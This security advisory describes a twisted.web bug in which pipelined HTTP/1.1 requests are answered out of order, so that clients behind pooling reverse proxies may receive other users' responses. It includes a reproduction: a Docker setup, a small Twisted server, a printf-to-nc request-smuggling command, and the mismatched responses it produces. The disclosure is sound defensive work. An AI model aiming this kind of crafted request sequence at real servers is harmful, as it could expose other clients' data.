The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.
docker run --workdir /repro --rm -it debian:bookworm-slim
apt -y update && apt -y install ncat git python3 python3-pip \
&& git clone --recurse-submodules https://github.com/twisted/twisted \
&& cd twisted \
&& pip3 install --break-system-packages .
from twisted.web import server, resource
from twisted.internet import reactor
class TheResource(resource.Resource):
isLeaf = True
def render_GET(self, request) -> bytes:
return b"GET"
def render_POST(self, request) -> bytes:
return b"POST"
site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html
POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html
GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html
POST
See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
{ "nvd_published_at": "2024-07-29T15:15:15Z", "cwe_ids": [ "CWE-444" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-07-29T16:33:11Z" }